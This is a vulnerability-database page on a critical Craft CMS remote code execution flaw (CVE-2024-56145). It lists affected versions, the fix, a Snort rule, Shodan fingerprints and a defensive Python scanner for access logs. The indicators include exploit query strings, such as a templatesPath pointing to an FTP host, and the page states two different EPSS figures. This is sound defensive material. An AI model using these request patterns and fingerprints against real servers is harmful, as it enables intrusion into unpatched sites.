CVE-2024-56145
published 2024-12-18


Priority: P1 · 98 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-06-23
Exploited in the wild
EPSS: 97.45% (99.9th percentile)
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.

Affected (9 ranges)

Vendor   | Product   | Version range              | Fixed in
craftcms | cms       |                            |
craftcms | cms       |                            |
craftcms | cms       |                            |
craftcms | cms       | >= 3.0.0 < 3.9.14          | 3.9.14
craftcms | cms       | >= 4.0.0-RC1 < 4.13.2      | 4.13.2
craftcms | cms       | >= 5.0.0-RC1 < 5.5.2       | 5.5.2
craftcms | craft_cms | >= 3.0.0 < 3.9.14          | 3.9.14
craftcms | craft_cms | >= 4.0.0 < 4.13.2          | 4.13.2
craftcms | craft_cms | >= 5.0.0 < 5.5.2           | 5.5.2

Detection & IOCs (extracted from sources)

url: ?--configPath=/nuclei_test/{{nonce}}
command: ?--templatesPath=ftp://
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|3f 2d 2d|templatesPath|3d|ftp|3a 2f 2f|"; fast_pattern; reference:cve,2024-56145; reference:url,www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms; classtype:attempted-admin; sid:2058436; rev:1; metadata:affected_product CraftCMS, attack_target Web_Server, tls_state TLSDecrypt, created_at 2024_12_20, cve CVE_2024_56145, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_12_20; target:dest_ip;)
  • Look for HTTP GET requests containing `--templatesPath` or `--configPath` query parameters in the URI, which are the primary exploitation vectors for this vulnerability.
  • Nuclei PoC probe returns HTTP 503 with body containing `mkdir()`, `Permission denied`, or `No such file or directory` — use these response strings to identify exploitation attempts.
  • Shodan/FOFA fingerprinting: Craft CMS instances can be identified via `http.html:"craftcms"`, `http.favicon.hash:"-47932290"`, or `icon_hash=-47932290` — use these to scope exposure.
  • The Metasploit module exploits the vulnerability by abusing the `--templatesPath` argument to load arbitrary templates via FTP, leading to RCE — monitor for outbound FTP connections from web server processes.
  • EPSS score of 0.94049 (99.9th percentile) and confirmed KEV listing indicate active in-the-wild exploitation — prioritize detection and patching accordingly.
  • Exploitation requires `register_argc_argv` to be enabled in php.ini. Instances with this setting disabled are NOT vulnerable — scope detection rules accordingly.
  • The Snort/ET rule targets TLS-decrypted traffic (deployment tags: SSLDecrypt, TLSDecrypt) — the rule will not fire on encrypted HTTPS traffic without TLS inspection in place.
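The detection notes above boil down to one observable: with `register_argc_argv` enabled, PHP splits the raw query string on `+` into `$argv`, so a request whose query string starts with `--` is handing CLI options to the script. The following scanner is an added example written for this record, not code from the page's sources or from Craft CMS. It generalizes slightly beyond the two option names the page lists: `--templatesPath` and `--configPath` are rated high, and any other `--option` token in a query string is flagged at medium as generic argv injection. The access-log lines are constructed, the `LOG_RE` combined-log pattern and the `+`-splitting approximation of PHP's argv handling are this example's own assumptions, and the IPs are documentation ranges.

```python
import re
from urllib.parse import unquote, urlsplit

# Craft CLI option names this page records as the observed exploitation vectors.
KNOWN_OPTIONS = {"templatesPath", "configPath"}

# Minimal combined-log-format matcher (assumption of this example, not from the page).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic) covering both IoCs from the page,
# a benign request, and a generic "--option" probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Dec/2024:10:01:02 +0000] "GET /index.php?--templatesPath=ftp://203.0.113.9/ HTTP/1.1" 503 512',
    '203.0.113.5 - - [20/Dec/2024:10:01:03 +0000] "GET /?--configPath=/nuclei_test/abc123 HTTP/1.1" 503 498',
    '198.51.100.7 - - [20/Dec/2024:10:02:00 +0000] "GET /index.php?p=blog&page=2 HTTP/1.1" 200 8731',
    '198.51.100.8 - - [20/Dec/2024:10:02:05 +0000] "GET /index.php?--help HTTP/1.1" 200 100',
]


def argv_tokens(query: str) -> list:
    """Approximate how register_argc_argv turns a query string into $argv:
    the raw string is split on '+'. Percent-decoding is applied so an encoded
    '%2D%2D' prefix is not missed."""
    return [unquote(tok) for tok in query.split("+") if tok]


def inspect_request(target: str):
    """Return a finding for a request target that carries '--option' argv tokens,
    or None when the query string looks like ordinary key=value parameters."""
    query = urlsplit(target).query
    options = []
    for tok in argv_tokens(query):
        if tok.startswith("--"):
            # '--templatesPath=ftp://...' -> 'templatesPath'
            options.append(tok[2:].split("=", 1)[0])
    if not options:
        return None
    known = [o for o in options if o in KNOWN_OPTIONS]
    return {"options": options, "severity": "high" if known else "medium"}


def scan_access_log(lines) -> list:
    """Scan access-log lines and collect findings with source IP and response status.
    A 503 on a flagged request matches the probe behaviour the page describes."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        hit = inspect_request(m.group("target"))
        if hit:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")), **hit})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```

Because the check is on the query string rather than on TLS-visible bytes, it complements the Snort rule above on hosts where HTTPS is terminated at the web server and only access logs are available. Tokens are split before percent-decoding on purpose: that mirrors the argv split, so a benign parameter such as `q=a--b` is not flagged, while a leading `--` is caught whether or not it was encoded.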

CVSS provenance

nvd       | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd       | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck |      | 9.3 | CRITICAL |
cisa      |      | 9.3 | CRITICAL |